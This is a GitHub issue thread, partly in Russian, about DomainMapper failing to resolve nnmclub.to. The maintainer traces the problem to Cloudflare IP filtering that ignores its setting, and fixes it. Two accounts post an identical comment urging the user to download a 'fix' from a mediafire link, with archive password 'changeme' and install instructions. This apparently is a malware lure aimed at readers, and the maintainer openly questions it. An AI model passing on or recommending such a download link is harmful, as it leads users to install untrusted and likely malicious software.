### ISSUE TITLE
custom-dns-list

### ISSUE THREAD

**Issue by sanikroot** [Ground-Zerro/DomainMapper#17]
Не определяет ip для "nnmclub.to" из custom-dns-list.txt, но через nslookup  ip находит.

В файле с результатами появляется строка "/32"
Строка "/32"  появляется при subnet = no

============вывод  nslookup ====================
nslookup nnmclub.to
Server:         1.1.1.1
Address:        1.1.1.1#53

Non-authoritative answer:
Name:   nnmclub.to
Address: 104.21.95.93
Name:   nnmclub.to
Address: 172.67.144.20
Name:   nnmclub.to
Address: 2606:4700:3037::ac43:9014
Name:   nnmclub.to
Address: 2606:4700:3035::6815:5f5d

====мой файл конфигурации ================
[DomainMapper]
service = custom
dnsserver = 4
cloudflare = yes
subnet = no
filename = my.txt
threads = 5
filetype = cidr
gateway =
listname =
run =

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sanikroot** [comment]
My operating system is Linux, ubuntu 24.04.

**Comment by Ground-Zerro** [comment]
Приветствую.
у "nnmclub.to" Cloudflare IP адрес, фильтрация которых включена у вас в конфиге.

**Comment by Ground-Zerro** [comment]
> to fix your trouble try download this fix, i see it in another issue,
> https://app.mediafire.com/3ag3jpquii3of
> password: changeme
> when you installing, you need to place a check in install to path and select "gcc."

А это что простите?
Качать не рискну, но оооочень интересно....

**Comment by sanikroot** [comment]
Я пробовал с cloudflare = no, не помогло.
Также менял dnsserver = 2 и 0

**Comment by Ground-Zerro** [comment]
> Я пробовал с cloudflare = no, не помогло.
> Также менял dnsserver = 2 и 0

Проверил.
Найден баг.
Фильтрация Cloudflare не учитывает настройки и всегда удаляет IP, даже если эта опция вЫключена.

Буду исправлять.
Спасибо.

**Comment by Ground-Zerro** [comment]
Исправлено.
